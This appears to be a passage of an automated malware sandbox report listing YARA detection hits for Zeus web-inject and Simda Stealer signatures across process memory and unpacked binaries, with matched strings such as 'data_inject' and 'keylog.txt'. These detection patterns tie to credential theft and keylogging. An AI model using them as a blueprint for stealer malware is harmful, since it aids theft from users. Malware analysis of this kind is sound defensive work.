00000001.00000003.2010460715.0000000003C60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2025731561.0000000003C60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2104048966.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2079645449.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2088591684.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2085749007.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2107473137.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2107627120.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2107190009.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
00000001.00000003.1664876030.0000000002570000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2100321942.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2064074801.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2106495197.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2046920489.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2082103389.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2103873411.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2060038870.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
00000001.00000003.2086084822.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2033279627.0000000003C60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2090984983.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000003.2099961240.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
Process Memory Space: Bonelessness.exe PID: 6696	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
Process Memory Space: Bonelessness.exe PID: 6696	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x67b4:$a1: name=%s&port=%u 0x3713e:$a1: name=%s&port=%u 0x5708:$a2: data_inject 0x36092:$a2: data_inject 0x5cc2:$a3: keylog.txt 0x3664c:$a3: keylog.txt 0x55d7:$a4: User-agent: %s]]] 0x35f61:$a4: User-agent: %s]]] 0x68b8:$a5: %s\%02d.bmp 0x37242:$a5: %s\%02d.bmp
Process Memory Space: svchost.exe PID: 6720	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
Process Memory Space: svchost.exe PID: 6720	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x9026:$a1: name=%s&port=%u 0x130b9:$a1: name=%s&port=%u 0x87971:$a1: name=%s&port=%u 0xac352:$a1: name=%s&port=%u 0xb6594:$a1: name=%s&port=%u 0xe79f9:$a1: name=%s&port=%u 0x1078fb:$a1: name=%s&port=%u 0x7f7a:$a2: data_inject 0x12002:$a2: data_inject 0x868ba:$a2: data_inject 0xab29b:$a2: data_inject 0xb54dd:$a2: data_inject 0xe694d:$a2: data_inject 0x106844:$a2: data_inject 0x8534:$a3: keylog.txt 0x125bc:$a3: keylog.txt 0x86e74:$a3: keylog.txt 0xab855:$a3: keylog.txt 0xb5a97:$a3: keylog.txt 0xe6f07:$a3: keylog.txt 0x106dfe:$a3: keylog.txt
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6260	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x16484:$a1: name=%s&port=%u 0x1e7f9:$a1: name=%s&port=%u 0x153cd:$a2: data_inject 0x1d742:$a2: data_inject 0x15987:$a3: keylog.txt 0x1dcfc:$a3: keylog.txt 0x1529c:$a4: User-agent: %s]]] 0x1d611:$a4: User-agent: %s]]] 0x16588:$a5: %s\%02d.bmp 0x1e8fd:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6216	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x3834:$a1: name=%s&port=%u 0x17382:$a1: name=%s&port=%u 0x277d:$a2: data_inject 0x162cb:$a2: data_inject 0x2d37:$a3: keylog.txt 0x16885:$a3: keylog.txt 0x264c:$a4: User-agent: %s]]] 0x1619a:$a4: User-agent: %s]]] 0x3938:$a5: %s\%02d.bmp 0x17486:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 3496	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x370b:$a1: name=%s&port=%u 0x245a6:$a1: name=%s&port=%u 0x2654:$a2: data_inject 0x234ef:$a2: data_inject 0x2c0e:$a3: keylog.txt 0x23aa9:$a3: keylog.txt 0x2523:$a4: User-agent: %s]]] 0x233be:$a4: User-agent: %s]]] 0x380f:$a5: %s\%02d.bmp 0x246aa:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7140	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x97dd:$a1: name=%s&port=%u 0x15f54:$a1: name=%s&port=%u 0x8726:$a2: data_inject 0x14e9d:$a2: data_inject 0x8ce0:$a3: keylog.txt 0x15457:$a3: keylog.txt 0x85f5:$a4: User-agent: %s]]] 0x14d6c:$a4: User-agent: %s]]] 0x98e1:$a5: %s\%02d.bmp 0x16058:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7124	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xc7a0:$a1: name=%s&port=%u 0x1c926:$a1: name=%s&port=%u 0xb6e9:$a2: data_inject 0x1b86f:$a2: data_inject 0xbca3:$a3: keylog.txt 0x1be29:$a3: keylog.txt 0xb5b8:$a4: User-agent: %s]]] 0x1b73e:$a4: User-agent: %s]]] 0xc8a4:$a5: %s\%02d.bmp 0x1ca2a:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7088	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xb285:$a1: name=%s&port=%u 0x21759:$a1: name=%s&port=%u 0xa1ce:$a2: data_inject 0x206a2:$a2: data_inject 0xa788:$a3: keylog.txt 0x20c5c:$a3: keylog.txt 0xa09d:$a4: User-agent: %s]]] 0x20571:$a4: User-agent: %s]]] 0xb389:$a5: %s\%02d.bmp 0x2185d:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7064	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x15598:$a1: name=%s&port=%u 0x235de:$a1: name=%s&port=%u 0x144e1:$a2: data_inject 0x22527:$a2: data_inject 0x14a9b:$a3: keylog.txt 0x22ae1:$a3: keylog.txt 0x143b0:$a4: User-agent: %s]]] 0x223f6:$a4: User-agent: %s]]] 0x1569c:$a5: %s\%02d.bmp 0x236e2:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7040	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x38d7:$a1: name=%s&port=%u 0x16a0f:$a1: name=%s&port=%u 0x2820:$a2: data_inject 0x15958:$a2: data_inject 0x2dda:$a3: keylog.txt 0x15f12:$a3: keylog.txt 0x26ef:$a4: User-agent: %s]]] 0x15827:$a4: User-agent: %s]]] 0x39db:$a5: %s\%02d.bmp 0x16b13:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7024	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x3c09:$a1: name=%s&port=%u 0x24484:$a1: name=%s&port=%u 0x2b52:$a2: data_inject 0x233cd:$a2: data_inject 0x310c:$a3: keylog.txt 0x23987:$a3: keylog.txt 0x2a21:$a4: User-agent: %s]]] 0x2329c:$a4: User-agent: %s]]] 0x3d0d:$a5: %s\%02d.bmp 0x24588:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7008	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x3806:$a1: name=%s&port=%u 0xa62a:$a1: name=%s&port=%u 0x274f:$a2: data_inject 0x9573:$a2: data_inject 0x2d09:$a3: keylog.txt 0x9b2d:$a3: keylog.txt 0x261e:$a4: User-agent: %s]]] 0x9442:$a4: User-agent: %s]]] 0x390a:$a5: %s\%02d.bmp 0xa72e:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6988	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xc738:$a1: name=%s&port=%u 0x18146:$a1: name=%s&port=%u 0xb681:$a2: data_inject 0x1708f:$a2: data_inject 0xbc3b:$a3: keylog.txt 0x17649:$a3: keylog.txt 0xb550:$a4: User-agent: %s]]] 0x16f5e:$a4: User-agent: %s]]] 0xc83c:$a5: %s\%02d.bmp 0x1824a:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6968	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xcd71:$a1: name=%s&port=%u 0x21d82:$a1: name=%s&port=%u 0xbcba:$a2: data_inject 0x20ccb:$a2: data_inject 0xc274:$a3: keylog.txt 0x21285:$a3: keylog.txt 0xbb89:$a4: User-agent: %s]]] 0x20b9a:$a4: User-agent: %s]]] 0xce75:$a5: %s\%02d.bmp 0x21e86:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6944	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0xcc76:$a1: name=%s&port=%u 0x1acb0:$a1: name=%s&port=%u 0xbbbf:$a2: data_inject 0x19bf9:$a2: data_inject 0xc179:$a3: keylog.txt 0x1a1b3:$a3: keylog.txt 0xba8e:$a4: User-agent: %s]]] 0x19ac8:$a4: User-agent: %s]]] 0xcd7a:$a5: %s\%02d.bmp 0x1adb4:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6920	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x11578:$a1: name=%s&port=%u 0x2456f:$a1: name=%s&port=%u 0x104c1:$a2: data_inject 0x234b8:$a2: data_inject 0x10a7b:$a3: keylog.txt 0x23a72:$a3: keylog.txt 0x10390:$a4: User-agent: %s]]] 0x23387:$a4: User-agent: %s]]] 0x1167c:$a5: %s\%02d.bmp 0x24673:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6896	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x124d4:$a1: name=%s&port=%u 0x1e77c:$a1: name=%s&port=%u 0x1141d:$a2: data_inject 0x1d6c5:$a2: data_inject 0x119d7:$a3: keylog.txt 0x1dc7f:$a3: keylog.txt 0x112ec:$a4: User-agent: %s]]] 0x1d594:$a4: User-agent: %s]]] 0x125d8:$a5: %s\%02d.bmp 0x1e880:$a5: %s\%02d.bmp
Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6876	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x6fa5:$a1: name=%s&port=%u 0x21ea3:$a1: name=%s&port=%u 0x5eee:$a2: data_inject 0x20dec:$a2: data_inject 0x64a8:$a3: keylog.txt 0x213a6:$a3: keylog.txt 0x5dbd:$a4: User-agent: %s]]] 0x20cbb:$a4: User-agent: %s]]] 0x70a9:$a5: %s\%02d.bmp 0x21fa7:$a5: %s\%02d.bmp
Click to see the 103 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.3.svchost.exe.39e0000.13.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.2.Bonelessness.exe.406400.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48410:$a1: name=%s&port=%u 0x47ba8:$a2: data_inject 0x47d98:$a3: keylog.txt 0x47a3d:$a4: User-agent: %s]]] 0x48564:$a5: %s\%02d.bmp
8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.25.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.26.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
6.2.JbrLYfXaOpqnSngA.exe.d52000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
